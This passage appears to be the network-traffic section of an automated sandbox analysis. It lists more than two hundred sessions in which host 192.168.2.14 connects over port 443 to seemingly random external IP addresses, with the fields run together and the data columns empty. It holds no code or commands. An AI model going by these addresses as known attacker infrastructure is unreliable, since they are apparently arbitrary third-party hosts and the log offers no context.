                                              11098192.168.2.1439628178.185.89.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11099192.168.2.145118844.8.60.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11100192.168.2.1437404130.194.178.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11101192.168.2.145419294.140.21.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11102192.168.2.144373870.89.174.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11103192.168.2.144038024.34.163.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11104192.168.2.1450014179.238.197.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11105192.168.2.1435592107.13.217.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11106192.168.2.145178831.122.225.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11107192.168.2.1458072157.50.17.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11108192.168.2.1446626157.133.167.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11109192.168.2.145070072.88.30.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11110192.168.2.1450476102.47.59.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11111192.168.2.1457668217.76.254.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11112192.168.2.1445800195.67.243.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11113192.168.2.1447366189.162.252.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11114192.168.2.145256632.65.58.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11115192.168.2.1449036198.90.113.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11116192.168.2.144369443.58.192.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11117192.168.2.1453724188.147.254.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11118192.168.2.1455646174.116.182.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11119192.168.2.1453436220.132.29.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11120192.168.2.1452202100.253.163.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11121192.168.2.1443590205.46.63.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11122192.168.2.1435080140.207.244.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11123192.168.2.144942449.157.71.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11124192.168.2.145127246.9.151.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11125192.168.2.145565286.198.144.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11126192.168.2.145603477.10.65.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11127192.168.2.144455646.226.255.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11128192.168.2.143994882.239.65.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11129192.168.2.1445398134.192.98.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11130192.168.2.1434610156.184.57.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11131192.168.2.143824694.55.245.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11132192.168.2.145207462.218.11.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11133192.168.2.1435470199.203.189.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11134192.168.2.1448740109.82.220.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11135192.168.2.1444412199.245.7.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11136192.168.2.1434260203.28.32.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11137192.168.2.1433052138.59.166.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11138192.168.2.1433496122.169.147.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11139192.168.2.1446672179.56.135.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11140192.168.2.1452172140.205.153.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11141192.168.2.1444502207.177.42.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11142192.168.2.1454936169.194.17.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11143192.168.2.144930842.255.43.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11144192.168.2.1437246124.154.46.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11145192.168.2.1434434108.54.131.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11146192.168.2.145268662.28.217.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11147192.168.2.14351624.2.72.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11148192.168.2.1451122114.30.55.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11149192.168.2.144256039.24.66.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11150192.168.2.1460270176.162.192.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11151192.168.2.145617283.200.169.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11152192.168.2.1441450142.134.165.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11153192.168.2.145011436.182.200.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11154192.168.2.144722824.106.156.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11155192.168.2.1443004100.60.55.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11156192.168.2.1447604105.228.198.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11157192.168.2.1441346208.232.73.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11158192.168.2.1437686105.224.165.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11159192.168.2.14582048.201.227.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11160192.168.2.1456982103.50.87.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11161192.168.2.1442434108.240.238.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11162192.168.2.145303479.63.61.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11163192.168.2.144673036.155.81.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11164192.168.2.1435652134.94.16.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11165192.168.2.1460204210.18.33.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11166192.168.2.145630688.165.10.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11167192.168.2.143720445.177.238.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11168192.168.2.145868668.49.238.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11169192.168.2.1440776111.153.211.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11170192.168.2.1442414152.84.55.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11171192.168.2.146057645.142.135.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11172192.168.2.1447016210.85.1.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11173192.168.2.143944218.116.186.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11174192.168.2.144374049.89.16.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11175192.168.2.1441940200.123.238.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11176192.168.2.14443441.151.214.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11177192.168.2.1445508136.235.136.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11178192.168.2.145593091.20.135.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11179192.168.2.1441286173.112.110.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11180192.168.2.1448926196.3.150.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11181192.168.2.143644250.78.142.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11182192.168.2.1449420143.42.135.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11183192.168.2.1451966100.169.244.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11184192.168.2.1447966146.126.111.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11185192.168.2.1453824204.153.167.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11186192.168.2.1453732101.103.114.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11187192.168.2.1458794168.196.84.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11188192.168.2.145982050.159.101.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11189192.168.2.1444374200.162.91.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11190192.168.2.1451888179.175.166.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11191192.168.2.1438554133.30.167.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11192192.168.2.143652689.247.82.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11193192.168.2.1460310143.220.8.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11194192.168.2.1444952112.108.63.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11195192.168.2.1448638115.183.226.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11196192.168.2.14578304.130.161.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11197192.168.2.1458260104.45.200.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11198192.168.2.145058089.142.89.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11199192.168.2.145824676.192.12.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11200192.168.2.1450504134.11.109.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11201192.168.2.1455370126.153.175.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11202192.168.2.14356222.57.65.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11203192.168.2.1439440132.171.67.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11204192.168.2.144374269.246.151.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11205192.168.2.145054253.11.132.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11206192.168.2.1436644101.129.66.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11207192.168.2.1444926142.123.254.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11208192.168.2.1444542104.129.27.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11209192.168.2.143543895.92.71.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11210192.168.2.1440698147.130.237.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11211192.168.2.1433760117.194.52.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11212192.168.2.1436152126.221.41.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11213192.168.2.143550695.22.162.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11214192.168.2.146006635.71.0.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11215192.168.2.1433364194.65.51.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11216192.168.2.144872860.25.222.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11217192.168.2.145007060.97.3.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11218192.168.2.1443416223.202.229.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11219192.168.2.1435086188.224.157.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11220192.168.2.1446880211.34.203.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11221192.168.2.1451332223.25.208.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11222192.168.2.145241894.85.214.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11223192.168.2.1441506178.29.155.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11224192.168.2.1453254223.196.29.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11225192.168.2.145205878.22.51.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11226192.168.2.1441182181.137.255.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11227192.168.2.1454426157.241.147.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11228192.168.2.1458450210.189.149.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11229192.168.2.145614850.104.200.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11230192.168.2.1458254150.180.166.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11231192.168.2.1458096188.74.92.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11232192.168.2.1443958187.209.96.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11233192.168.2.1447460191.4.162.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11234192.168.2.1434634111.108.124.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11235192.168.2.1433716154.42.6.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11236192.168.2.1435556155.35.251.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11237192.168.2.1451886124.179.38.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11238192.168.2.145611071.113.185.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11239192.168.2.144589065.64.23.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11240192.168.2.14435542.24.33.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11241192.168.2.1442004197.136.50.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11242192.168.2.14440889.21.132.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11243192.168.2.1438490218.255.193.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11244192.168.2.1445452130.98.154.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11245192.168.2.1449554167.90.193.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11246192.168.2.1457418201.135.98.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11247192.168.2.1452868180.208.207.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11248192.168.2.1444388218.187.93.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11249192.168.2.1443946100.211.230.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11250192.168.2.1435030109.87.80.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11251192.168.2.1435956209.104.106.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11252192.168.2.144221073.177.95.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11253192.168.2.144065432.214.181.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11254192.168.2.143911674.158.145.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11255192.168.2.1446354203.243.3.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11256192.168.2.1450024175.191.215.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11257192.168.2.144807249.64.33.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11258192.168.2.144836841.71.202.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11259192.168.2.144463280.228.50.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11260192.168.2.1435276138.213.243.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11261192.168.2.145111245.152.79.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11262192.168.2.145185043.151.83.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11263192.168.2.1436140135.47.233.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11264192.168.2.1453284135.101.175.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11265192.168.2.145339861.212.75.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11266192.168.2.145095480.170.135.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11267192.168.2.1457502152.65.167.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11268192.168.2.1443390159.45.23.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11269192.168.2.145471642.162.126.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11270192.168.2.1434550199.133.114.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11271192.168.2.144785236.21.40.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11272192.168.2.1454016189.242.106.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11273192.168.2.145335451.185.84.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11274192.168.2.1444096177.157.99.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11275192.168.2.1443090133.30.108.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11276192.168.2.144266254.237.160.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11277192.168.2.1439692199.141.20.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11278192.168.2.1439130183.51.3.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11279192.168.2.1457020213.123.220.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11280192.168.2.1454242159.140.242.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11281192.168.2.1455104180.43.225.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11282192.168.2.1436436110.148.149.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11283192.168.2.145271427.51.112.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11284192.168.2.144755031.138.190.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11285192.168.2.143657288.4.92.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11286192.168.2.1453882119.187.140.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11287192.168.2.1454662167.115.26.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11288192.168.2.1458792128.174.52.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11289192.168.2.1439492191.107.117.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11290192.168.2.145573027.168.19.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11291192.168.2.143570290.212.85.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11292192.168.2.1454136206.99.148.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11293192.168.2.1433692110.220.139.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11294192.168.2.143603873.191.20.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11295192.168.2.1449468185.187.188.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11296192.168.2.1453162122.223.200.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11297192.168.2.146022689.73.60.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11298192.168.2.1434292108.62.136.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11299192.168.2.1456846150.144.254.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11300192.168.2.143706617.149.46.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11301192.168.2.144043067.120.192.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11302192.168.2.143459891.150.103.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11303192.168.2.145760650.160.202.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11304192.168.2.1447992174.59.208.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11305192.168.2.1438338202.216.67.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11306192.168.2.1450136122.86.223.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11307192.168.2.1433662181.144.104.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11308192.168.2.145699075.49.187.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11309192.168.2.144710070.101.92.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11310192.168.2.1454380133.80.38.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11311192.168.2.1460862106.71.97.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11312192.168.2.1442040150.177.47.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11313192.168.2.145717814.35.135.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11314192.168.2.145518832.3.114.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11315192.168.2.145270062.150.37.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11316192.168.2.143535247.227.251.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11317192.168.2.1452382128.81.69.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11318192.168.2.1444034178.36.189.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11319192.168.2.1454438163.249.211.193443
                                              TimestampBytes transferredDirectionData


